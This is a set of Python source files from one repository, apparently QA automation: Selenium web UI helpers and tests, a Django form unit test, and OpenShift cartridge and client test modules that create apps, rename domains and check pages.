wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"form > input.button\").click()\n time.sleep(5)\n\ndef reset_password(classself,user):\n go_to_home(classself)\n go_to_signin(classself)\n click_element_by_xpath(classself,\"//*[@id='lost_password']/p/a\")\n# click_element_by_css(classself,\"a.password_reset.more\")\n time.sleep(2)\n assert_text_equal_by_css(classself,\"Reset your password\",\"#reset_password > header > h1\")\n input_by_id(classself,\"email_input\",user)\n click_element_by_css_no_wait(classself,\"#password-reset-form > form > input.button\")\n \ndef change_password(classself,user,oldpwd,oldpwd2,newpwd,newpwdcfm):\n go_to_home(classself)\n time.sleep(4)\n go_to_signin(classself)\n login(classself,user,oldpwd)\n go_to_express_console(classself)\n scroll_bar(classself)\n try:click_element_by_link_text(classself,\"Click here to change your password\")\n except:click_element_by_css(classself,\"a.change_password\")\n time.sleep(3)\n assert_text_equal_by_css(classself,\"Change your password\",\"#change_password > header > h1\")\n input_by_name(classself,\"old_password\",oldpwd2)\n input_by_id(classself,\"password\",newpwd)\n input_by_name(classself,\"password_confirmation\",newpwdcfm)\n click_element_by_css(classself,\"#change-password-form > form > input.button\")\n time.sleep(1)\n if classself.driver.current_url not in [classself.base_url+\"/app/dashboard\",classself.base_url+\"/app/control_panel\"]:\n classself.fail(\"fail,it goes wrong location\")\n \n\ndef scroll_bar(classself):\n classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(5)\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n time.sleep(10)\n\ndef scroll_by(classself):\n classself.driver.execute_script(\"window.scrollBy(-100,-100);\")\n\ndef scroll_to_upper(classself):\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\ndef scroll_to_middle(classself):\n classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n\n\ndef scroll_to_bottom(classself):\n classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\ndef generate_greetings(username):\n _greetings=\"Greetings, \" + username \n _greetings+=\"!\"\n return _greetings\n\ndef logout(classself):\n assert_element_present_by_link_text(classself,\"Sign out\")\n click_element_by_link_text(classself,\"Sign out\")\n assert_element_present_by_link_text(classself,\"Sign in\")\n\n\ndef wait_for_ajax(classself,timeout = 10):\n time.seep(timeout)\n #WebDriverWait(classself.driver, timeout).until(classself.driver.execute_script(return jQuery.active == 0;))\n\ndef update_config_file(section,name,value):\n configparse= ConfigParser.RawConfigParser()\n configparse.read('config.cfg')\n configparse.set(section,name,value)\n with open('config.cfg', 'wb') as configfile:\n configparse.write(configfile)\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5656092166900635, "alphanum_fraction": 0.5728190541267395, "avg_line_length": 32.02381134033203, "blob_id": "6b5dafe6855f356673f575fe633189d48223f7ee", "content_id": "da4ea7a9eea5afd136824479eaa31c0eccb0b7b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2778, "license_type": "no_license", "max_line_length": 79, "num_lines": 84, "path": "/depot/depotapp/tests.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#coding: utf8\n\n\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\nfrom forms import ProductForm\n\n\nclass SimpleTest(TestCase):\n def test_basic_addition(self):\n \"\"\"\n Tests that 1 + 1 always equals 2.\n \"\"\"\n self.assertEqual(1 + 1, 2)\n\nclass ProductTest(TestCase):\n def setUp(self):\n \"\"\"initialazation\"\"\"\n self.product = {\n 'title': 'My Book Title',\n 'description': 'yyy',\n 'image_url': 'http://google.com/logo.png',\n 'price': 1,\n 'date_available': '2012-12-12'\n }\n\n f = ProductForm(self.product)\n f.save()\n self.product['title'] = 'My Another Book Title'\n\n def test_attrs_cannot_empty(self):\n \"\"\"title.description, price, image_url can not be empty\"\"\"\n f = ProductForm({})\n self.assertFalse(f.is_valid())\n self.assertTrue(f['title'].errors)\n self.assertTrue(f['description'].errors)\n self.assertTrue(f['price'].errors)\n self.assertTrue(f['image_url'].errors)\n self.assertTrue(f['date_available'].errors)\n\n def test_price_positive(self):\n \"\"\"price must be great than 0\"\"\"\n f = ProductForm(self.product)\n self.assertTrue(f.is_valid())\n\n self.product['price'] = 0\n f = ProductForm(self.product)\n self.assertFalse(f.is_valid())\n \n self.product['price'] = -1\n f = ProductForm(self.product)\n self.assertFalse(f.is_valid())\n\n self.product['price'] = 1\n\n def test_imgae_url_endwiths(self):\n \"\"\"image_url must endwith jpg,png,gif, case-insansative\"\"\"\n url_base = 'http://google.com/'\n oks = ('fred.gif', 'fred.jpg', 'fred.png', 'FRED.JPG', 'FRED.Jpg')\n bads = ('fred.doc', 'fred.gif/more', 'fred.gif.more')\n for endwith in oks:\n self.product['image_url'] = url_base + endwith\n f = ProductForm(self.product)\n self.assertTrue(f.is_valid(), \\\n msg='error when image_url endwith'+endwith)\n for endwith in bads:\n self.product['image_url'] = url_base + endwith\n f = ProductForm(self.product)\n self.assertFalse(f.is_valid(), \\\n msg='error when image_url endwith'+endwith)\n\n self.product['image_url'] = 'http://google.com/logo.png'\n\n def test_title_unique(self):\n \"\"\"title must be unique\"\"\"\n self.product['title'] = 'My Book Title'\n f = ProductForm(self.product)\n self.assertFalse(f.is_valid())\n self.product['title'] = 'My Another Book Title'\n" }, { "alpha_fraction": 0.5824474096298218, "alphanum_fraction": 0.5928522944450378, "avg_line_length": 33.80315017700195, "blob_id": "2f80a2f6ded1968d70704cca3f609824ccd62e66", "content_id": "dd3d9e1eed40837e1dfc9cd7eb39347ec2ae6380", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4421, "license_type": "no_license", "max_line_length": 126, "num_lines": 127, "path": "/automation/open/testmodules/RT/cartridge/rockmongo_after_alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1545][BusinessIntegration][embed_web_interface]use rockmongo after alter domain namespace \nhttps://tcms.engineering.redhat.com/case/123975/\n\"\"\"\n\nimport os,sys,re,random,string\nimport testcase,common,OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1545][BusinessIntegration][embed_web_interface]use rockmongo after alter domain namespace\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name - used `php` as default\")\n self.test_variant = 'python'\n\n self.app_name = common.getRandomString(14)\n self.domain_name = common.get_domain_name()\n self.new_domain_name = common.getRandomString(10)\n self.app_type = common.app_types[self.test_variant]\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass RockmongoAfterAlterNamespace(OpenShiftTest):\n\n def test_method(self):\n #1\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n #2\n self.steps_list.append(testcase.TestCaseStep(\"Alter the domain name\",\n common.alter_domain,\n function_parameters=[self.new_domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was altered successfully\",\n expect_return=0))\n\n #3\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-%s\"%common.cartridge_types['mongodb']],\n expect_return = 0))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\n \"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-%s\"%common.cartridge_types['rockmongo']],\n expect_return = 0))\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\"Alter the domain name\",\n common.alter_domain,\n function_parameters=[self.domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was altered successfully\",\n expect_return=0))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\n \"check whether rockmongo working\",\n self.check_rockmongo,\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def check_rockmongo(self, negative = False):\n keyword = \"RockMongo\"\n if negative:\n keyword = \"503 Service Temporarily Unavailable\"\n url = OSConf.get_embed_info(self.app_name, common.cartridge_types[\"rockmongo\"], \"url\")+\"/index.php?action=login.index\"\n ret = common.grep_web_page(url, keyword, options=\"-k -H 'Pragma: no-cache'\", delay=5, count=10)\n os.system(\"curl -k -H 'Pragma: no-cache' %s\"% url)\n return ret\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RockmongoAfterAlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.47045764327049255, "alphanum_fraction": 0.4786543846130371, "avg_line_length": 38.3020133972168, "blob_id": "5ea3228e0482f3fd61196ccbd059f3ed5084ae6b", "content_id": "3a957d5a503e1a69730ad0906c57e5ceb992fa70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 101, "num_lines": 149, "path": "/automation/open/testmodules/RT/client/thread_dump_ruby_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport re\n\nimport common\nimport proc\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n supported_variants = [\"jbossas\", \"ruby\", \"ruby-1.9\"]\n self.info(\"[US1413][UI]Generate thread dump for jboss app from ruby client\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.variant = self.get_variant()\n except:\n self.variant = 'jbossas'\n\n if self.variant not in supported_variants:\n raise rhtest.TestSuiteAbort(\"Unsupported test variant: %s\"%self.variant)\n\n self.app_type = common.app_types[self.variant]\n self.info(\"VARIANT: %s\"%self.variant)\n self.app_name = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n self.info(\"Killing subprocess: rhc tail\")\n #self.p.print_output()\n self.p.kill()\n\n\nclass ThreadDumpRubyClient(OpenShiftTest):\n def create_proc(self, cmd):\n self.p = proc.Proc(cmd)\n return 0\n\n def test_method(self):\n # 1.Create an app\n (retcode, output) = rhtest.TestStep(self,\n \"1. Create a %s app\"%self.variant,\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0)()\n\n # 2.Create thread dump log file\n (retcode, output) = rhtest.TestStep(self,\n \"2.Create thread dump log file\",\n \"rhc threaddump %s -l %s -p '%s' %s\" % (self.app_name, \n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"the app should be created successfully\",\n expect_return=0,\n expect_str = [\"RESULT:\\nSuccess\"])()\n\n # 3.Use rhc tail to tail thread dump log file in a subprocess\n try:\n obj = re.search(r\"The thread dump file.* -f ([^\\s]+)\", output)\n logfile = obj.group(1)\n except:\n return self.abort(\"Unable to find logfile from recent stdout\")\n cmd = \"stdbuf -o0 rhc tail %s -l %s -p '%s' -f %s -o '-n +1' %s\" %(self.app_name, \n self.user_email, \n self.user_passwd, \n logfile,\n common.RHTEST_RHC_CLIENT_OPTIONS)\n (retcode, output) = rhtest.TestStep(self,\n \"3.Run 'rhc tail' in a subprocess\",\n self.create_proc,\n function_parameters=[cmd],\n expect_return = 0,\n expect_description=\"'rhc tail' should be started\")()\n\n # 4.Check the output\n if self.variant == 'jbossas':\n regex = [\"DeploymentScanner-threads\",\n \"Periodic Recovery\",\n \"Transaction Reaper\"]\n elif self.variant in (\"ruby\", \"ruby-1.9\"):\n regex = [\"Current thread\", \n \"backtrace dump\"]\n\n for r in regex:\n (retcode, output) = rhtest.TestStep(self,\n \"4.Check the output\",\n self.p.grep_output,\n function_parameters=[r, 3, 5, 0, False],\n expect_description=\"'%s' should be found in the output\" % (r),\n expect_return=0)()\n\n # 5.Check the output\n if self.variant == 'jbossas':\n regex = \"DestroyJavaVM\"\n\n (retcode, output) = rhtest.TestStep(self,\n \"5.Check the output\",\n self.p.grep_output,\n function_parameters=[regex, 3, 5, 0, False],\n expect_description=\"'%s' should be found in the output\" % (regex),\n expect_return=0)()\n\n # 8.Restart the app\n (retcode, output) = rhtest.TestStep(self,\n \"6.Restart the app\",\n \"rhc app restart %s -l %s -p '%s' %s\" % (self.app_name,\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"App should be restarted\",\n expect_return=0)()\n\n # 9.Check the output\n if self.variant == 'jbossas':\n common.sleep(30)\n #regex = \"CORBA Naming Service started\"\n regex = [\"ORB Run Thread\"]\n elif self.variant in (\"ruby\", \"ruby-1.9\"):\n regex = [\"spawn_rack_application\",\n \"spawn_application\"]\n for r in regex:\n (retcode, output)= rhtest.TestStep(self,\n \"7.Check the output\",\n self.p.grep_output,\n function_parameters=[r, 3, 5, 0],\n expect_description=\"'%s' should be found in the output\" % (r),\n expect_return=0)()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ThreadDumpRubyClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5395243763923645, "alphanum_fraction": 0.5548131465911865, "avg_line_length": 37.72368240356445, "blob_id": "7c2bfaed8fad4152994399422b496655ed7cb58d", "content_id": "58798ff44278fa72cfc82698e8a9ae15d0504ced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8830, "license_type": "no_license", "max_line_length": 145, "num_lines": 228, "path": "/automation/open/testmodules/UI/web/case_122222.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122222.py\n# Date: 2012/07/03 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckHomeFooter(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n \n #Assert all the elements of footer \n web.assert_text_equal_by_xpath('DEVELOPERS',\n '''//div[@id='footer-nav']/div/div/nav/header/h3/a''')\n web.assert_text_equal_by_xpath('Get Started',\n '''//div[@id='footer-nav']/div/div/nav/ul/li/a''')\n web.assert_text_equal_by_xpath('User Guide',\n '''//div[@id='footer-nav']/div/div/nav/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('FAQ',\n '''//div[@id='footer-nav']/div/div/nav/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Pricing',\n '''//div[@id='footer-nav']/div/div/nav/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('''COMMUNITY''',\n '''//div[@id='footer-nav']/div/div/nav[2]/header/h3/a''')\n web.assert_text_equal_by_xpath('Blog',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li/a''')\n web.assert_text_equal_by_xpath('''Forum''',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('IRC Channel',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Feedback',\n '''//div[@id='footer-nav']/div/div/nav[2]/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('GET INVOLVED',\n '''//div[@id='footer-nav']/div/div/nav[3]/header/h3/a''')\n web.assert_text_equal_by_xpath('Open Source',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li/a''')\n web.assert_text_equal_by_xpath('Make it Better',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('OpenShift on GitHub',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Newsletter sign up',\n '''//div[@id='footer-nav']/div/div/nav[3]/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('''ACCOUNT''',\n '''//div[@id='footer-nav']/div/div/nav[4]/header/h3/a''')\n web.assert_text_equal_by_xpath('Terms of Service',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li/a''')\n web.assert_text_equal_by_xpath('Privacy Policy',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('Security Policy',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li[3]/a''') \n web.assert_text_equal_by_xpath('Plans',\n '''//div[@id='footer-nav']/div/div/nav[4]/ul/li[4]/a''') \n\n #check all the links of footer\n #DEVELOPERS\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/header/h3/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Developer Center',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Developers page is missing')\n\n #GET STARTED\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Started with OpenShift',\n '''/html/body/div[@id='content']/div/div/div/div/div/h1''',\n '`LEARN MORE` page is missing')\n\n\n\n #User Guide\n #web.go_to_home()\n #web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/ul/li[2]/a''')\n #time.sleep(2)\n #web.assert_text_equal_by_xpath('User Guide',\n # '''//div[@id='id1407351']/div/div/div[2]/h1''',\n # 'User Guide is missing')\n\n #FAQ\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav/ul/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Frequently Asked Questions',\n '''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div''','FAQ is missing')\n\n #Pricing\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='footer-nav']/div/div/nav/ul/li[4]/a\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('Pricing','''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div''','Get Started page is missing')\n\n #COMMUNITY\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/header/h3/a''')\n web.sleep(5)\n web.assert_text_equal_by_xpath('Welcome to OpenShift',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div[1]''',\n 'Community page is missing')\n\n #Blog\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('OpenShift Blog',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Blog page is missing')\n\n #Forum\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Forums',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Forums page is missing')\n \n #IRC Channel\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[2]/ul/li[3]/a''')\n time.sleep(5)\n web.check_title(\"Connection details - freenode Web IRC\")\n\n\n\n #GET INVOLVED\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/header/h3/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Involved',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Get Involved page is missing')\n \n #Open Source\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('OpenShift is Open Source',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Open Source page is missing')\n \n #Make it better\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Involved with OpenShift',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Get Involved with Openshift page is missing')\n\n #OpenShift on GitHub\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li[3]/a''')\n time.sleep(2)\n web.assert_element_present_by_link_text(\"crankcase\")\n\n #Newsletter Sign Up\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[3]/ul/li[4]/a''')\n time.sleep(2)\n web.check_title(\"OpenShift Newsletter Signup\")\n \n #ACCOUNT\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/header/h3/a''')\n time.sleep(2)\n web.check_title(\"Sign in to OpenShift | OpenShift by Red Hat\")\n \n #Terms of service\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li/a''')\n time.sleep(2)\n web.check_title(\"Terms of Use | OpenShift by Red Hat\")\n\n #Privacy Policy\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li[2]/a''')\n time.sleep(2)\n web.check_title(\"OpenShift Privacy Statement | OpenShift by Red Hat\")\n\n #Security Policy\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li[3]/a''')\n time.sleep(5)\n web.check_title(\"Security Information | OpenShift by Red Hat\")\n\n #Plans\n web.go_to_home()\n web.click_element_by_xpath('''//div[@id='footer-nav']/div/div/nav[4]/ul/li[4]/a''')\n time.sleep(5)\n web.check_title(\"Pricing | OpenShift by Red Hat\")\n\n self.tearDown()\n\n return self.passed(\"Case 122222 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckHomeFooter)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of CheckHomeContent.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6374593377113342, "alphanum_fraction": 0.6438030004501343, "avg_line_length": 48.070037841796875, "blob_id": "034fd38596c05c94e5417fbda42b256591d3359b", "content_id": "44069e1aa3286221cb7c66d20835d01a7d11f42f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12611, "license_type": "no_license", "max_line_length": 192, "num_lines": 257, "path": "/automation/open/testmodules/UI/web/tc_createapp.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport random\nimport HTMLTestRunner\n\n\nclass CreateApplication(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n self.exist_app=\"mypythonapp1\"\n baseutils.initiate(self)\n\n\n\n def get_domain_name(self):\n return self.driver.find_element_by_css_selector(\"div.current.domain\").text\n\n def generate_app_name(self):\n i=random.uniform(1,10)\n app_name=\"app\"+str(i)[5:10]\n return app_name\n\n def get_cartridge_list(self,id_name=\"express_app_cartridge\"):\n select=self.driver.find_element_by_id(id_name)\n options = select.find_elements_by_tag_name(\"option\")\n return options\n\n def assert_app_url(self,appname):\n _domain_name=self.get_domain_name()\n _app_url=\"http://\"+appname+\"-\"+_domain_name+\".\"+config.libra_server\n print \"=========================\"\n print _app_url\n baseutils.assert_element_present_by_link_text(self,_app_url)\n #baseutils.assert_text_equal_by_partial_link_text(self,_app_url,\"http://\"+appname+\"-\")\n\n def assert_app_url_after_change(self,appname,_new_domain):\n _app_url=\"http://\"+appname+\"-\"+_new_domain+\".\"+config.libra_server\n print \"=========================\"\n print _app_url\n baseutils.assert_element_present_by_link_text(self,_app_url)\n\n\n def create_application(self,app_name,cartridge_type):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n #VerifyDomainExist\n time.sleep(10)\n # baseutils.assert_element_present_by_id(self,\"show_namespace\")\n # self.driver.refresh()\n # self.driver.refresh()\n baseutils.wait_element_present_by_id(self,\"express_app_app_name\")\n self.driver.find_element_by_id(\"express_app_app_name\").clear()\n self.driver.find_element_by_id(\"express_app_app_name\").send_keys(app_name)\n cartridges=self.get_cartridge_list()\n self.assertTrue(len(cartridges) >= 5)\n for car in cartridges:\n if car.text == cartridge_type or car.text.find(cartridge_type) != -1:\n car.click()\n break\n #baseutils.click_element_by_xpath(self,\"//body/section/div/div[2]/div[2]/div[1]/div[1]/form[1]/fieldset[1]/ol[1]/li[1]/input[@id='express_app_submit']\")\n #self.driver.find_element_by_id(\"express_app_submit\").click()\n time.sleep(2)\n baseutils.scroll_bar(self)\n time.sleep(1)\n baseutils.click_element_by_id(self,\"express_app_submit\")\n\n def delete_application(self):\n# baseutils.go_to_home(self)\n time.sleep(4)\n# baseutils.go_to_signin(self)\n# baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n appname=self.driver.find_element_by_xpath(\"//div[@id='app_list_container']/ul/li/header/h1\").text\n print appname\n baseutils.click_element_by_link_text(self,\"Delete...\") \n# baseutils.assert_element_present_by_xpath(self,\"//div[@id='app_list_container']/ul/li/div/div/a\")\n# self.driver.find_element_by_xpath(\"//div[@id='app_list_container']/ul/li/div/div/a\").click() \n time.sleep(3)\n baseutils.wait_element_present_by_xpath(self,\"//form[@id='\"+appname+\"_delete_form']/input[3]\")\n baseutils.click_element_by_xpath(self,\"//form[@id='\"+appname+\"_delete_form']/input[3]\")\n time.sleep(15)\n baseutils.wait_element_not_present_by_xpath(self,\"//div[@id='app_list_container']/ul/li[5]/header/h1\")\n \n def test_a_create_app_with_blank_appname(self):\n self.create_application(\"\",\"jbossas\")\n time.sleep(2)\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_app_name_input']/label[2]\")\n\n #baseutils.assert_text_equal_by_css(self,\"App name is invalid; App name can't be blank\",\"div.message.error\")\n \n def test_b_create_app_with_nonalphnum_appname(self):\n self.create_application(\"app_1\",\"jbossas-7.0\")\n time.sleep(2)\n baseutils.assert_text_equal_by_xpath(self,\"ONLY LETTERS AND NUMBERS ARE ALLOWED\",\".//li[@id='express_app_app_name_input']/label[2]\")\n \n \n def test_c_create_app_with_blank_cart(self):\n self.create_application(\"myapp\",\"\")\n time.sleep(2)\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_cartridge_input']/label[2]\")\n \n \n def test_d_create_app_with_blacklist_appname(self):\n self.create_application(\"openshift\",\"perl-5.10\")\n time.sleep(2)\n baseutils.assert_text_equal_by_css(self,\"App name openshift is not a permitted app name\",\"div.error.message\")\n \n def test_e_create_app_with_blankapp_blankcart(self):\n self.create_application(\"\",\"\")\n time.sleep(2)\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_app_name_input']/label[2]\")\n baseutils.assert_contain_text_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\"//li[@id='express_app_cartridge_input']/label[2]\")\n\n #baseutils.assert_text_equal_by_css(self,\"App name is invalid; App name can't be blank; Cartridge can't be blank; Cartridge is not a valid cartridge.\",\"div.message.error\") \n \n def test_f_create_jboss_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"jbossas\")\n time.sleep(20)\n # baseutils.is_element_displayed(self,By.ID,\"spinner\")\n # baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n self.assert_app_url(_appname)\n # if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.error.message\"):\n # pass\n # else:\n # baseutils.assert_contain_text_by_id(self,\"using Java with JBossAS 7 on OpenShift:\",\"spinner-text\")\n # baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n # baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n \n def test_g_create_perl_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"perl\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)\n #if baseutils.is_text_displayed (self,\"We're sorry, this 